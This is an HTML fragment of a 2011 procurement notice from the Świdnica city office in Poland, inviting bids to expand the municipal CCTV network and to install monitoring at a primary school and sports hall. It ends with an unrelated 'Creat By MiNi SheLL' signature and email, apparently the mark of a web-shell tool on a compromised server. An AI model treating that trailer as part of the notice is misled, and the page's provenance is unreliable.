<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.swidnica.bip-gov.info.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Świdnicy, ul. Armii Krajowej 49, 58-100 Świdnica, Miejskie Biuro Przetargów pok. 124, I p..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.11.2011 godzina 09:00, miejsce: Urząd Miejski w Świdnicy, ul. Armii Krajowej 49, 58-100 Świdnica, Miejskie Biuro Przetargów pok. 124, I p..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie A -	rozbudowa i modernizacja miejskiego monitoringu wizyjnego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> . Zakres przedmiotu zamówienia obejmuje:

Zadanie A:
rozbudowę i modernizację miejskiego monitoringu wizyjnego w szczególności:
a)	modernizację punktów kamerowych wizyjnego monitoringu miejskiego miasta Świdnica 
	w zakresie:
a1)	dostawę 7 kamer szybkoobrotowych, dostawę 1 wideoserwera, dostawę 8 dysków  
		zewnętrznych, 9 aktywnych rozgałęźników sygnału wideo, 1 przełącznika sieciowego,
a2)	demontaż istniejących kamer,
a3)	montaż na istniejących uchwytach dostarczonych kamer, zamianę wideoserwerów,
a4)	konfigurację kamer,
a5)	podłączenie do wideoserwerów, w modernizowanych punktach kamerowych, zewnętrznych dysków twardych do archiwizacji nagrań;
b) uruchomienie 3 punktów kamerowych w zakresie:
b1)	dostawę 1 kamery szybkoobrotowej, 2 kamer sieciowych, 1 dysku zewnętrznego,
		klienckiego zestawu radiowego, 1 aktywnego rozgałęźnika sygnału wideo, 2 przełączników sieciowych,
b2)	montaż i uruchomienie kamer i wideoserwera,
b3)	uruchomienie połączeń radiowych,
b4)	konfigurację systemu monitoringu miejskiego do obsługi nowych kamer..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 45.30.00.00-0, 32.41.80.00-6, 45.31.23.30-9, 45.31.23.00-0, 32.23.00.00-4, 32.26.00.00-3, 32.32.35.00-8, 38.65.16.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie B -	dostawa i uruchomienie systemu monitoringu wizyjnego otoczenia obiektów: Szkoły  Podstawowej nr 1 i przyległej Hali Sportowej ŚOSiR..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotu zamówienia obejmuje:
Zadanie B:
dostawę i uruchomienie systemu monitoringu wizyjnego otoczenia obiektów: Szkoły Podstawowej nr 1 i przyległej Hali Sportowej ŚOSiR, w szczególności:
a)	dostawę urządzeń radiowych i uruchomienie radiowej transmisji wizji, dźwięku i sterowania pomiędzy obiektem i istniejąca stacją bazową sieci monitoringu miejskiego, w tym:
		- 1 radiolinia,
		- 1 sektor stacji bazowej,
		- 1 radiowe urządzenie klienckie,
b)	dostawę i uruchomienie urządzeń do monitorowania otoczenia obiektów, w tym:
		- 4 kamery sieciowe,
		- 1 rejestrator,
c)	dostawę i uruchomienie urządzeń audio do rozgłaszania komunikatów głosowych w miejscach monitorowanych, w tym:
		- 4 głośniki zewnętrzne i wzmacniacze audio,
		- 1 mikrofon pulpitowy z włącznikiem manualnym,
d)	podłączenie do sieci radiowej i odpowiednią konfigurację istniejącego monitoringu Szkoły Podstawowej nr 1, w tym:
		- 1 router z firewallem..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 45.30.00.00-0, 32.41.80.00-6, 45.31.23.30-9, 45.31.23.00-0, 32.23.00.00-4, 32.26.00.00-3, 32.32.35.00-8, 38.65.16.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com